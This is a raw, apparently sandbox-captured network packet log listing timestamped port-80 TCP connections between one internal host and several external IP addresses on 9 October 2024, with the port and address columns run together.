                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.189485073 CEST4974680192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:25.559689045 CEST4974680192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.577306986 CEST4974780192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.709441900 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.709752083 CEST4974780192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.720030069 CEST4974780192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.852217913 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.852323055 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.852375031 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.852442980 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.852612972 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.854825020 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.854892015 CEST804974772.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.855030060 CEST4974780192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:28.231000900 CEST4974780192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.248462915 CEST4974880192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.380067110 CEST804974872.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.380394936 CEST4974880192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.385818958 CEST4974880192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519345999 CEST804974872.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519380093 CEST804974872.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519403934 CEST804974872.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.519824028 CEST4974880192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.521738052 CEST4974880192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:29.653374910 CEST804974872.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:35.087570906 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:36.088543892 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:38.103745937 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:42.118516922 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:50.132329941 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:57.164522886 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:58.177511930 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:00.192639112 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:04.207457066 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:12.221338034 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:19.253921032 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:20.266516924 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:22.281649113 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:26.296436071 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:34.310283899 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:41.342432022 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:42.339826107 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:44.354978085 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:48.369755983 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:56.383658886 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.526437044 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.620753050 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.620944023 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.628859043 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.723133087 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.736970901 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737091064 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737102032 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737257004 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737304926 CEST8049750172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.737462997 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:09.130836010 CEST4975080192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.148401022 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.242966890 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.243159056 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.251105070 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.345838070 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357562065 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357672930 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357683897 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.357901096 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.358639956 CEST8049751172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:10.358822107 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:11.755256891 CEST4975180192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.772805929 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.866758108 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.866998911 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875029087 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875077963 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875128031 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875296116 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969098091 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969213009 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969223976 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969348907 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969358921 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969367981 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983220100 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983345032 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983355999 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983529091 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.984000921 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.984222889 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:14.379738092 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.399468899 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.494075060 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.494287968 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.499568939 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.593913078 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610013962 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610105991 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610236883 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610241890 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610250950 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610261917 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610315084 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610323906 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610502005 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610502005 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.613859892 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.708091974 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.737404108 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.831650972 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.831842899 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.839765072 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.934262991 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.259969950 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260082006 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260133982 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260232925 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260356903 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:22.346676111 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.364257097 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.458642006 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.458873987 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.467556000 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.562014103 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711045027 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711055994 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711247921 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711656094 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711806059 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:24.971103907 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:25.988682985 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.083416939 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.083636999 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092662096 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092710018 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092760086 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187529087 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187541962 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187551975 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187560081 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187567949 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187741041 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187753916 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963123083 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963135958 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963149071 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963311911 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:27.595546007 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.613065004 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.707717896 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.707918882 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.713229895 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.807821035 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488059044 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488219023 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488234997 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488401890 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.491774082 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.586417913 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.627223969 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.788378000 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.788686991 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.796564102 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.959156036 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967178106 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967196941 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967207909 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967220068 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967350006 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967514992 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968401909 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968498945 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968511105 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968535900 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968682051 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968735933 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968761921 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968916893 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:35.130352020 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:35.130393982 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:35.130409002 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:35.130605936 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:36.312429905 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.329965115 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.491499901 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.491647005 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.500271082 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.663305044 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669632912 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669781923 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669796944 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669903994 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669918060 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669929028 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669939995 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669950962 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670012951 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670078039 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670135975 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670232058 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670301914 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670496941 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.831171989 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.831310034 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.831325054 CEST8049759203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.831469059 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:39.014976978 CEST4975980192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.032514095 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.194022894 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.194242001 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202300072 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202347994 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202398062 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.363420963 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.363543987 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372203112 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372242928 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372343063 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372359037 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372426987 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372441053 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372456074 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372522116 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372606039 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372618914 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372806072 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372911930 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372963905 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.373011112 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.373150110 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.536273956 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.536293030 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.536309958 CEST8049760203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.536536932 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:41.717575073 CEST4976080192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:42.735357046 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:42.896406889 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:42.896817923 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:42.902000904 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.063210964 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068521976 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068536997 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068551064 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068562031 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068648100 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068661928 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068839073 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068890095 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068914890 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068929911 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069103956 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069133997 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069150925 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069339991 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.229803085 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.229818106 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.229959965 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.230062962 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.230217934 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.233408928 CEST4976180192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.393867970 CEST8049761203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.040543079 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.135579109 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.135786057 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.143647909 CEST4976280192.168.11.2023.227.38.74
